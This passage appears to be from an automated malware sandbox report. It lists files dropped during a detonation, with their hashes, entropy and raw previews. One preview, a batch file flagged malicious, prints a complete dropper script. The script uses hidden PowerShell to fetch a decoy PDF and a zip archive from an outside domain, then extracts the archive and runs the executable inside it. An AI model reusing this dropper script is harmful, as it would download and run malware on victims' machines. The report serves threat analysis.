Preview:	J.....9.b......h....=<.5}.^U....}./.L.k6nz....Q..7z3.c..... 2..b8..c.a...C.....2y.(.0..-...S....8....o,.T.&.c..G. .....q.B..Sf..........M....m.A\|..S.N.:....?0R....$:...........q.q.!.F....T..h.....d.s...fR.+\1.[+o.;u..u..{g<.......4.f..w..-..._.Q....yT.<L..h.G.j...._@.9c;sT.....<...-k.1..NW....1q..?.KZ...u.........{?....?..pl.-...\|..O,f)q.oZ.=....G..2..5,q.\.......H%..+......N..Z...h.......t.{.m..6.d....3.Y..9........w...e.\";.;.!...S..[...........t.;..Ek.c_`....+."...Q._?[.1 ..d...]....6..Y.v.qh...Ss!...v.$..H........f.....?.a.\..R.-.w....b.1..g..yJL...)...AJ.>JYl:.[m....{^...<.G..M.4A.W...J..yd.Y..s....V..V.p..d...r..`....p..S.@.p..c.M....."D~.J.C.].R...j......J..F.o.s#...Nq..V...`..t/........v.p2B.Z*6....=.A...4S,...R.e...F.6..e.Q.y.>..O...e.%..~....tj....\|.e.$.j9%.[[..x9w.G..g.`.....^.p.I.f......k.4....%..9....nnz...3_fy..\|..a..@6.C.,.P.....V...d..P..Fn.. ...B....Zs....inB<...&..5c....B...w)S.....E@2..%....b.l-.l

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Different

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	6.548010857173451
Encrypted:	false
SSDEEP:	1536:V1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdz:VZg5PXPeiR6MKkjGWoUlJU5
MD5:	56BB83409EE3E1A9DDF64E5364CBAAF6
SHA1:	C3DA7B105A8C389BE6381804CB96BB0461476E39
SHA-256:	D76B1AAACC225CD854E0EC33C5268C02824EE4A1120B5217916C24D23E249696
SHA-512:	59D1D8C1C613F89CBAA8B5C242CEA4889BA8F8B423D66598C5ED3A26FD82752A9CA0742C1ED932B3A1FBEDB5B8701AB6321C35E9DDE5A801625350CFF7990AC6
Malicious:	false
Preview:	U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dressing

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	137216
Entropy (8bit):	6.481339286025911
Encrypted:	false
SSDEEP:	3072:npIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTqI:IphfhnvO5bLezWWt/Dd314V14ZgP08
MD5:	1CB233987779B587705687B7D8F66A01
SHA1:	5F33D543C24701D370072BB4E77E4A8D058AE035
SHA-256:	48A4A6FD51F6F62D3E814BCF14891ACE7D7813C90BE50D6B133FBEFF21B9E137
SHA-512:	56DF98EC38109FB121D69D84140EFFC81F0EEF25BFB48C25D23EF5C45C274A5DC4015DBFDB63616530F804896B9F19788AAE60BFCCBC43292F113E2EC82350F6
Malicious:	false
Preview:	.j.....I......u0..$.I....Q..\|....L..t..I8.A..\|....D..t..@8.@...j..E.PW....I....u:..$.I....Q..\|....L..t..I8.A..\|....D..t..@8W.@....(.I..X....u.W....I...t8..$.I....Q..\|....L..t..I8.A..\|....D..t..@8W.@....(.I.....u.........F......>_^3.[....U...$VW...M..&....E..@..0....p...N..U.......u.....I...u=..$.I....Q..\|:...L:.t..I8.A..\|:...D:.t..@8.M.h..I..@....M...L.@.j..0.E.P.L.......u.....I.P.M......M.......U.M.......M..E.P.\...M.......M......_3.^....U...0...SVW.}...G........W...]..J......M...h..I..9M.....u....H..\|1...D1.t..@8.H...\|1...D1.t..@8.@...!...j...t...........PS.............G.P.V...YP.M...#...].j.WS.u.....I..............tw.E..x..r..@..H..+.....uIS..;..q..Y;.u:S.M...#...M......U.M.......M..E.P.}[...M......M......V.M.WSW....P.........@..j.j..H....[......$.I....I..\|1...T1.t..R8.B..\|1...D1.t..@8.@...E..(.u.j.P.(...S.i......_^3.[....U..SV.u...W.F....Q....V....J.......N...I..o...j.PRW....I..u......3....F........u3.&...$.I....I..\|....T..t..R8.B..\|....D..t..@8.@.....>_^3.[]...U

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c2[1].bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	498
Entropy (8bit):	5.198499125177484
Encrypted:	false
SSDEEP:	12:wmDU081kkGrAOtD0OO081kkGVX5OQ981kvYX53RP:wmD7RrAO90OxRxUkvYX53RP
MD5:	E8DFDB915A523A09E139AAA900991DDD
SHA1:	D23F4798C549BFB7DDD968C4C2A971F67468A662
SHA-256:	91619737B3F7AF4623DC62B4F3DF7B551337EC94F693A3B9BA35BB231483393E
SHA-512:	B4E737D1C80420688BF856DF02A580B691D120307B7D31EA4766448CCD0C6EEC7B2C48424691E92DFFBA58CA8C9A8DF989F5B683D9363CAC37D3DD3E5AD1623E
Malicious:	true
Preview:	@echo off..set url=https://myguyapp.com/msword.zip..set url2=https://myguyapp.com/W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %USERPROFILE%\Downloads\W2.pdf"..cd %USERPROFILE%\Downloads..start W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url% -OutFile %temp%\msword.zip"..powershell -WindowStyle Hidden -Command "Expand-Archive -Path %temp%\msword.zip -DestinationPath %temp%\msword -Force"..cd %temp%\msword..start msword.exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	5.019506780280991
Encrypted:	false
SSDEEP:	12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzd:qlupdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	7459F6DA71CD5EAF9DBE2D20CA9434AC
SHA1:	4F60E33E15277F7A632D8CD058EC7DF4728B40BC
SHA-256:	364A445C3A222EE10A8816F78283BBD0503A5E5824B2A7F5DCD8E6DA9148AF6A
SHA-512:	3A862711D78F6F97F07E01ACC0DCB54F595A23AACEA9F2BB9606382805E1E92C1ACE09E1446F312F3B6D4EE63435ABEF46F0C16F015BD505347A1BCF2E149841
Malicious:	false
Preview:	{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Indonesia

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	6.557400918137722
Encrypted:	false
SSDEEP:	1536:D7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynBk:nt8T6pUkBJR8CThpmESv+AqVnBk
MD5:	15BE985957A02EE4B7D96A3C52FF0016
SHA1:	B3819CED551350AFD965B7CA5D7CF91AE5C1A83C
SHA-256:	E223F63B343F2BB15155825BA679F91FCAF2DB9E359988B7ABD24202EBEC2AFF
SHA-512:	9A56A0EBAA86F59F56F92937AA724FC1BFD1DBFFDE430E9D86598C94D8ED958ABA82021AEC758A22786746F807DCEBE99974EFF6975EFE8EFD68CBFBC85D030C
Malicious:	false
Preview:	.tM...u.S..S..Y.x.3.PPPPWSPP....I..E...t';.}...VP.u...Y..3.PP.u.VWSPP....I...^..3._[..SW3...PPj.SPh........I.....t-V3.j.Z.........Q.#...YW..Vj.Sj.h........I...^_[.U..E....t....uA..3M..(.=.3M..t1.}..t+.=.3M..t...3M..H......3M..u..u..u..........2.]...U..QQ.E..e...E...y..e...E...3M.P.....u..M.........U..Q.e...=.3M..t..=.3M..t...3M..H......3M..E.P.u........t.......E...3M.P.u...............SV..3.W8^.t..N..y...t.Q.:\...~..^.8^.t......N..y...t.Q..\...~..^..._^[.U..VW......t..U..w......B..F..G...1j........E.Y.&..H..N...y..f...0..V.C....G..F..w..._^]...U....SV..M.W3..~..~..A..F...t....A..F..A..F.............3..j Z.........3...........P.$...Y..t$......E...t......\|..... ...u.E.3.....F.9>~[.]...E..K..V.....M.U......Z..A..B..A..B..A..].;.].t..M.P......M.U..A.G.B..E... .E.;>\|._..^[....V..N..{.....^.......U..V..W3.G.N...;.~!Hj....*...j..8.F..F......G...YY....f.E..~._f..3..f.H...^]...Vh..F..q..6j Q.a..........QV....YY..^...U..M...u.3..%.E.V.u..;.}.....t.+........t.+...^]...U..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Instantly

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	6.7085176792029815
Encrypted:	false
SSDEEP:	1536:Ph+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7f:PAU4CE0Imbi80PtCZEz
MD5:	7FC8AB46CD562FFA0E11F3A308E63FA7
SHA1:	DD205EA501D6E04EF3217E2D6488DDB6D25F4738
SHA-256:	5F9C0A68B1C7EECA4C8DBEA2F14439980ACE94452C6C2A9D7793A09687A06D32
SHA-512:	25EF22E2B3D27198C37E22DFCD783EE5309195E347C3CC44E23E5C1D4CB58442F9BF7930E810BE0E5A93DD6F28797C4F366861A0188B5902C7E062D11191599C
Malicious:	false
Preview:	.F..E.9E.rf.}..u,j.Xj.f.E.E.Pj..E.P.u.....I...t8.}..r:.F..F.;}........).U.......M..D.......M..L.-..F.....0.I....M..._^3.[.....]..U..QSV.u.3.W.}....F..F..E...E.;.s?...S.}...Yf;.u(.F.....u.j.[S.e...Yf;.u..F..F....;}.r.....0.I..._..^[..]..U..QV.u.V.J...Y..u.2..XW....?...k.0.....M..D0(.t.......@L.......u......M..\|0).u.2....E.P.....M..t0.....I......_^..]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E..&...f...f...............e......;.s...C<.u..F....G...E.G;.......r......+.......j.PW......PQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[......]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E........3.........V..V..u......;.s+.........u..F..j.Zf.....f...E....;.......r......+.......j.P.........WPQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[.......]..U.............L.3.E..M........?k.0SV.....M.3.u.W.D...M..........E......^........^.;...............P...;.s!.........u.j.Zf.....f......M.;.r.SShU.........Q..P...+...P..PSh.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Led

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	6.70232349488191
Encrypted:	false
SSDEEP:	3072:4nVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQb:4VIPPL/sZ7HS3zcNPj0nEo3tb2D
MD5:	C038EEFE422386831ACF8D9D6898D464
SHA1:	9CF7F3E9A50218D5E03617B793EAE447645E6A90
SHA-256:	1432A3A16C1D41EBB71D0A5CC03ED80A93817E6295B82FC63A1EC39D9320C701
SHA-512:	8327453C75ECC04DB02A6C1DC38B38EB486F4D773E2025097E4D6B6F8E78655A25B7FA3528E2E66381EF80175182F7C1B89A7E8DD63A655D8ECEF5AB1DDE5EA1
Malicious:	false
Preview:	J..........t.......u5.u../ ..w.tk........)w......E..$...E..._ ..tJ...0..tB..3............L.........E.,K.......K..<. cL.....;M...d....E....E.}....R....M.@.E.;............}..E..............;~\|.............}....}.t...%....=....u .......................}.................L.............M.,K.......K.... cL....t....t..._t.3........;E........E.M.@.E.;...X.........}..E..............;~\|.............}...}..M.t3...M.%....=....u"............%...............}..M.E....@.K....@.K.9U.r..@.;.t'..;.s.}.........E.M.@.E.;...s....<....}..........}..E..............;~\|..%..........}....}.t...%....=....u .............................}...$t&..@t!..`t.......r.......v.......s.3........;E...9....E.M.@.E.;...m.................}..E..........]....F\|.E.;...l..........}....}...E.t6.E..%....=....u%......................}.....E.......U.............L.........E.,K.......K..F\|.M.;..........E.}..........t-..%....=....u...G.......%....................U.............L.........E.,K.......K............1L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Leisure

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	7.997097243867807
Encrypted:	true
SSDEEP:	1536:7aUiJuOem/qCP8QNYVGuid4T3D91PkL2qW4zV2G4Jb:Ccm/qCP8kYuCB1bT4zV2rt
MD5:	838511D6727BE6237C1E4CD26A0885DE
SHA1:	7A9FFA35532A5817F04CB48C9E154B5C9DE74623
SHA-256:	D36E240FA73FFB483BBCEC5593B95B924D219EE1A95E6541E0CC3FEE0FD5ECB7
SHA-512:	AC880DA501150B974DF9B42AEF6A63346B6B5036A893A09FDD05D0FECB9FC655D3E76D19EF5DB48DFD54457D5FC514499526F476F595972E970ED9953842C029
Malicious:	false
Preview:	.~. ....)........5a.<......E.Ft.q/.....0....U.......d...l..4MQnM.o.`.bL..s./.<;.l..l.;aG._-.0.."/B.6G/....E!........R.C>N.%...D..y2...z.!....z...i......eT....3....e.z;..1........,..65..I b0n.U....B.#<.5..Q=U..%.%.7a[.\|....`..o-s....QW%....bx.^.....5..<.[p.i.(&y...m.H..qS:.pR.....!..P...o.].]o./..Yb0.H8?A.....V.n.1...%.>..'.......j:<;.?._....u.o..5..g]S.nT...J.K<&..yC..&xn.-..r.7..!.4\..aR."Nh+.........Y..'...I..(r..-..p=..vn...lA..Z7.....Y1.......'.3T.....g..p...."N....w?Y.;.......x}.........\R{........b...........H...o....%..=."....\|>j.f....FA...".z.qt...}...4.q3..b...K....o...-?t0.(....~.......,.C.3#7N.....k..p......l9P.b=qo...y$=P...%s.^.....[w...%.41..X.(.(:.a......_..t=e...$.I...?.!.2..m.e...>.''3..L..H.... .k..4.!.p.L....u..#......\...j......GF..+..K.u.J9&........~CUw..........m.q$V..._..n..9.J{.+f...I.x.z]%~.7A*..rF`......>.w8..z.....x..>X.#5.RO.F.e.B.xpw...q^...2<.71......../c.}.........2.k.^=..Pc...~.e.m.^...s.j..Kd...._.<.7...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Math

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	7.997538946660952
Encrypted:	true
SSDEEP:	1536:bA42RuQjUqaBXOkQHtReXxQiIjiDdmfLyiEmSZBhqjM1VOUWLAGuFIs:bAnRfjSKtIFELC5ZBhMMGuFIs
MD5:	7B5C9E82025D184E64A7413174CE1A1C
SHA1:	C552965CE73D43225541932D65C3B4B6342A70E4
SHA-256:	7A524BC28CF358088006F8F852D7AE59F5A143D8754E47FFE4A8F31533CF315E
SHA-512:	71214F0379E8104C198B16A304D593032264435DD2FE4A5383D3F39FA496D18A6B7EC770A90542028B71C7A50611313AE47234C5EA0A0FB81724557941B12EB4
Malicious:	false
Preview:	/@.......S7....S......L.<.s....0..8....v...$7.9...H..3..r.>:q.w.].B.#v...CU....\..-....,...Y..FUp.RYd...$e...O.7...9/._.J.....u>...K..8@k.......V..y.l.._.W&.Ix.-.}@tQ.~.UT.I.n.O..b..O ..]...a....fN.d..O.[.t.v...1..gt.u...$......`.Q...n;mds...'.o..s..N......NhO.p......a.k.....h.7r..w...FP.yO..2..%?.=.s.7#RA/..Y.f.......u.....JM..........:eR3.V...&..\|}.F.v.m....@...=...V..%.I.vX.x .Iv....p$.+dZ...T...4...(G...ez.O..%...8$;n. ..r7.V3.!...y...t.....Yz.<.??..W...W....tg..>....a.d..}.N.Jp...F.....!c.H.0,j..'#T.4:..q...Lt...n.........Kz.......G.'.)..x..g..."b.W.v\...v.`.\.V...W......~D.....0.(z.H.Y....T....}.`..<..%.Th........!....7.....A+q...?..l.MEHT.2..HW.....g.&.k........6GA.5.^...k..Tv9+k...24....t....5'.K.]..=l{.`..S.^6.<...!.Y.q.tmCYZ...........@O@.U.....qJ9.v^.`=....4aw...t..._ .U.FP..p,..[..7....F..'.\.R}6pI.$.'....Q.........../.H.....p.M9..Y..A!_..i......0.%......3xf..h5.g ......g.\Q.-1.T"...Ta.....]AC..._.2=n.3.`.r%....~.S.f

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Measurement

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	1237
Entropy (8bit):	3.752009061763574
Encrypted:	false
SSDEEP:	12:eyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VQ:eyGS9PvCA433C+sCNC1skNkvQfhSg
MD5:	47FE88841F7CEA67286B6BB812A7A09F
SHA1:	950297A08CADDC4F0FB20B0D84539DE2B8DA36E1
SHA-256:	33F5D8B8FB7CD67BB7C1805CE89BFC16C9F4BBFC0342D31C9946511FDC4B115C
SHA-512:	C200196C26738DFA7013356656D281284928E256E423B11F679A71C3F8E75F04927474CC4AF853C2FE351F6051B084A902FD03D3106E14062634251EECFFF73F
Malicious:	false
Preview:	Korea........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Missed

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	5.9158452815608795
Encrypted:	false
SSDEEP:	1536:qHsWccd0vtmgMbFuz08QuklMBNIimuzaAwus5:qLeAg0Fuz08XvBNbjaAts5
MD5:	E6FE42ADC3082D12E845756426492B6E
SHA1:	E1170EE049AB607162D1495B625AA74221AA8585
SHA-256:	BFEA812CBDAFE08DF94D9C13CC6364F3BE76793E4676488338A17E2866BF8DFD
SHA-512:	9E994CDCAF75089D9468BCC367FD9717F8F2F1FE10B181F0616C712A5674CACC7601421B72B1E50336F222CAAB392F09DB984C4671F5CAB8C1519102F4E4D6EC
Malicious:	false
Preview:	...?5.h!.....?.......?.......@.........................?..5.h!....>@...............................@................c.c.s...U.T.F.-.8...U.T.F.-.1.6.L.E.U.N.I.C.O.D.E.................................................................................8C......8C......0<......0<..+eG.W@..+eG.W@....B..?....B..?:;.....=:;.....=...t..?Z.fUUU.?...&WU.?{......?.......?.........9..B..@...2b....................................0<..0<.dW..dW................................@.......................................B.......B.................8..B..?0g.W..=.......................................?.......?......................0C......0C................................U....I.?.. ....u}.M.U..UUUUU.?Sz.....?........................................-DT.!.?.-DT.!..RUUUUU.?........v.F.$I.?.........3Y.E.?#Y...q...n.....?..;.9....../I.?hK.........d...?81.U.......H!G.?..#.$.....0\|.f?.K.RVn...TUUUU.?........~I..$I.?.g......HB.;E.?.....q.....{.?.x...................................?...... @...... @.......?

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Next

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	7.9979666143694095
Encrypted:	true
SSDEEP:	1536:WdRAC50xWY7+r0weiORc8vTDzcvmgmQj21JVWAQfqB+ILeLBuQi2FUqAqT3Y4+/u:GvY7+rJenS8vTvcvHj2zVWxfq5Uu5pqn
MD5:	52C875EB8A3EBC4643094465CDBB08D0
SHA1:	013139AD7BBE0E2522CCC69EE890E63D8CA3FF3C
SHA-256:	A363E5C9DD6872D625FDF1A6E957D0E08B4605E97D8130B0175A6889BE5196EC
SHA-512:	97A6489038FF72109EA847A94C55DB9798F165E3D570F8677C6139C930DC67420BA783BE2F3939B74676C673D6AAA7EF2CAB107DBF7908A5CE228916FCDAAB0B
Malicious:	false
Preview:	....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h\|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.........,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...\|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{\|.8.L.o;,.V...vC...B.p.X(T%..q..T..z..........M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[..I...?.v.tfJ..9....+..J.....g.....g.WK.....\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nr

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	ASCII text, with very long lines (975), with CRLF line terminators
Category:	dropped
Size (bytes):	23449
Entropy (8bit):	5.134148367041093
Encrypted:	false
SSDEEP:	384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
MD5:	9EF6EFA272560F1DEE8923508DAFE2C9
SHA1:	7E6572FA616E8FE8AB67D2518F8685EB01F46923
SHA-256:	3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
SHA-512:	D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
Malicious:	false
Preview:	Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nr.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (975), with CRLF line terminators
Category:	dropped
Size (bytes):	23449
Entropy (8bit):	5.134148367041093
Encrypted:	false
SSDEEP:	384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
MD5:	9EF6EFA272560F1DEE8923508DAFE2C9
SHA1:	7E6572FA616E8FE8AB67D2518F8685EB01F46923
SHA-256:	3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
SHA-512:	D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
Malicious:	false
Preview:	Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Protocol

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	43912
Entropy (8bit):	7.0754478586730984
Encrypted:	false
SSDEEP:	768:tBGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:tBGmdATGODv7xvTphAiPChgZ2kOE6
MD5:	28E6332970BFF06A0431BFEFBCD59462
SHA1:	20902CDBF1A8D4DC081ADB967692C0C4ADD030BC
SHA-256:	85C250563E37692A5A0188EAC2EE3E27D6A7DAB102E0200DF20D027B33DE8E91
SHA-512:	CB1FB1F5A97E6A4F790D61E6964FFA4967591946DC03C639E944455DE893070547DA9B5401952DD5FA93FF66CF5F66F7A15F04913C41F4514A7DE067C8E6F60C
Malicious:	false
Preview:	..].........`...]...]...]...........0................]...]...]...]...]...]...]...]....................................p...]...]...]...]...p...................................................................................................0.........................0......................................................................................00......h..... ....................(.....00............ ....................h........... .A?....00.... ..%.... .... ............. .h...........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee..................................................................................................................................................................7............................................(.........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee.................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Realm

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	42495
Entropy (8bit):	7.994847286020057
Encrypted:	true
SSDEEP:	768:0SLfZMdEvp3jxmff02Y0Vo91+u08R48OcPk4h+ZnWlJcCQbem8OU3VOmWZ:bZg02tV21q1P4h3wHAFOmWZ
MD5:	062E20D07FE052044D9339A8B3F1CB38
SHA1:	5428326E6D395EEBABEB3FFB1972AE6A8C3DA8AE
SHA-256:	84DB270DF2972367E799A4F919E5033475A5395B9AD59F50456E340A980B693A
SHA-512:	2EE25F17BB5BE528ABD2CE9FE4877BFA58B2D30A9503D22B31DD16C80A7B248D14142AAB42ACFFD0A069975490CF370435310E08187311365136680657D3BDF1
Malicious:	false
